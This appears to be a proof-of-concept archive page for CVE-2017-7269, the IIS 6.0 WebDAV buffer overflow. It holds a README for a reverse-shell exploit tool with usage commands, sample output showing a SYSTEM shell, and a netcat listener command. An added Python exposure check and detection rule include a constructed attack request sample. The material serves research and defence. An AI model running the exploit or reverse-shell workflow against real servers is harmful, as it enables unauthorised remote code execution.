Associated vulnerability
Title:
Microsoft Internet Information Services buffer error vulnerability
(CVE-2017-7269)
Description: Microsoft Windows Server 2003 R2 is a server operating system released by Microsoft Corporation (USA). Internet Information Services (IIS) is a set of basic Internet services that run on Microsoft Windows. The 'ScStoragePathFromUrl' function of the WebDAV service in IIS 6.0 on Microsoft Windows Server 2003 R2 contains a buffer overflow vulnerability. A remote attacker can exploit it by sending a specially crafted PROPFIND request and execute arbitrary code.
Description
CVE-2017-7269
Introduction
# EN
**GenWebDavIISExploit** is a proof-of-concept tool for a known buffer overflow in the WebDAV component of IIS 6.0 (CVE-2017-7269). It is intended for educational and research use, to show how the vulnerability can be leveraged to execute arbitrary code on a remote server.
## Disclaimer
This project is intended for **educational purposes only**. Use this tool responsibly and only on systems you own or have explicit permission to test. Unauthorized access to computer systems is illegal.
## Features
- Remote code execution on vulnerable IIS6 WebDAV servers.
- Dynamic payload generation with user-specified reverse IP and port.
- Easy-to-use command-line interface for rapid exploitation.
## Prerequisites
- **Python 3.x**: Ensure that Python 3 is installed on your system.
- **Network Access**: Ability to connect to the target machine's IP and port.
## Usage
### Command-Line Arguments
- **Target IP**: The IP address of the target IIS6 WebDAV server.
- **Target Port**: The port number on which the WebDAV service is running (usually 80).
- **Reverse IP**: Your IP address where the reverse shell should connect.
- **Reverse Port**: The port number on your system to receive the reverse shell.
## Example
```bash
python3 GenWebDavIISExploit.py <target_ip> <target_port> <reverse_ip> <reverse_port>
```
For example, against a target at 192.168.1.10:80 with a listener waiting on 192.168.1.5:4444:
```bash
python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444
```
## Example output
```
$ python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444
[*] Connecting to target 192.168.1.10 on port 80...
[*] Sending a specially crafted HTTP request to exploit the vulnerability...
[*] Payload length: 1744 bytes
[*] Waiting for a return connection...
[+] Response from target:
HTTP/1.1 200 OK
Content-Length: 123
Server: Microsoft-IIS/6.0
[+] Received a connection back from 192.168.1.10:12345
[+] Remote access successfully established!
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
   Connection-specific DNS Suffix  . : example.local
   IPv4 Address. . . . . . . . . . . : 192.168.1.10
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.1.1
```
## Notes
- Start a listener on the specified reverse port before launching the tool (for example `nc -lvnp 4444`); otherwise the reverse shell has nothing to connect back to.
- The target must be IIS 6.0 with WebDAV enabled: the overflow lives in the WebDAV `ScStoragePathFromUrl` code path reached through PROPFIND, so a server with WebDAV disabled is not exploitable by this tool.
- Use this tool only on systems you are authorized to test.
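The description above names the vulnerable code path (PROPFIND handled by WebDAV's `ScStoragePathFromUrl`) and the notes say the exploit only applies where WebDAV is enabled. The following is an added example, not code from GenWebDavIISExploit or its author, showing the two checks a practitioner wants around that: a non-destructive exposure check on an `OPTIONS /` response (IIS/6.0 banner, `DAV:` header, PROPFIND allowed), and a detection rule for the attack itself. It assumes what public exploits for this CVE do, which is to carry the overflow in an overlong `<http://localhost/...>` URL inside the PROPFIND `If:` header; the 256-byte token limit is an assumption chosen for the example, and all request/response samples are constructed, not captured traffic.

```python
"""Added example (not part of GenWebDavIISExploit): an offline pre-flight
check and a detection rule for CVE-2017-7269, operating on raw HTTP text."""
import re

# Public exploits for this CVE carry the overflow in an overlong
# "<http://localhost/...>" URL inside the PROPFIND If: header. The limit
# below is an assumption picked for this example; legitimate If headers
# hold short lock tokens or resource URLs.
IF_TOKEN_LIMIT = 256


def parse_http_head(raw: str):
    """Return (start_line, headers) from an HTTP request or response.
    Header names are lower-cased; repeated headers are joined with ', '."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        if ":" not in line:
            continue  # tolerate a malformed line instead of aborting
        name, value = line.split(":", 1)
        name, value = name.strip().lower(), value.strip()
        headers[name] = f"{headers[name]}, {value}" if name in headers else value
    return lines[0], headers


def webdav_exposed(options_response: str) -> bool:
    """Non-destructive exposure check on an 'OPTIONS /' response: IIS/6.0
    Server banner, a DAV: header and PROPFIND listed in Allow:. Run this
    before any exploit attempt; a failed overflow can crash the worker."""
    status, h = parse_http_head(options_response)
    if " 200 " not in status:
        return False
    allow = {m.strip().upper() for m in h.get("allow", "").split(",")}
    return ("microsoft-iis/6.0" in h.get("server", "").lower()
            and "dav" in h and "PROPFIND" in allow)


def is_exploit_attempt(raw_request: str) -> bool:
    """Detection rule: a PROPFIND whose If: header carries a <...> token
    longer than IF_TOKEN_LIMIT, the shape of the ScStoragePathFromUrl attack."""
    start, h = parse_http_head(raw_request)
    if not start.upper().startswith("PROPFIND "):
        return False
    tokens = re.findall(r"<([^>]*)>", h.get("if", ""))
    return any(len(t) > IF_TOKEN_LIMIT for t in tokens)


# --- constructed samples (assumed shapes, not captured traffic) ----------
OPTIONS_IIS6_DAV = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Microsoft-IIS/6.0\r\n"
    "DAV: 1, 2\r\n"
    "Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, "
    "MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH\r\n"
    "Content-Length: 0\r\n\r\n"
)
OPTIONS_NO_DAV = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Microsoft-IIS/6.0\r\n"
    "Allow: OPTIONS, TRACE, GET, HEAD, POST\r\n"
    "Content-Length: 0\r\n\r\n"
)
BENIGN_PROPFIND = (
    "PROPFIND /share/ HTTP/1.1\r\n"
    "Host: 192.168.1.10\r\n"
    "Depth: 1\r\n"
    "If: <http://192.168.1.10/share/notes.txt> (<opaquelocktoken:abc>)\r\n"
    "Content-Length: 0\r\n\r\n"
)
ATTACK_PROPFIND = (
    "PROPFIND / HTTP/1.1\r\n"
    "Host: 192.168.1.10\r\n"
    "If: <http://localhost/" + "A" * 1000 + "> (Not <locktoken:write1>) "
    "<http://localhost/" + "B" * 1000 + ">\r\n"
    "Content-Length: 0\r\n\r\n"
)

if __name__ == "__main__":
    print("exposed:", webdav_exposed(OPTIONS_IIS6_DAV), webdav_exposed(OPTIONS_NO_DAV))
    print("attack :", is_exploit_attempt(ATTACK_PROPFIND), is_exploit_attempt(BENIGN_PROPFIND))
```

`webdav_exposed` is what to run first: it tells you whether the PROPFIND path is reachable at all without sending anything that could crash the server. `is_exploit_attempt` is the same logic from the defender's side and can be fed raw requests from a WAF or proxy capture; IIS W3C logs do not record the `If:` header, so the rule needs the full request, not the access log.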
File snapshot
[4.0K] /data/pocs/100479bf52034f6788e657496f2755b9724b5f14
├── [ 15K] GenWebDavIISExploit.py
├── [1.0K] LICENSE
└── [5.2K] README.md
0 directories, 3 files
Notes
1. Accessing the PoC through its original source is recommended.
2. If the source is no longer available or cannot be reached, email f.jinxu#gmail.com (replace # with @) to request the local snapshot.
3. 神龙 has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.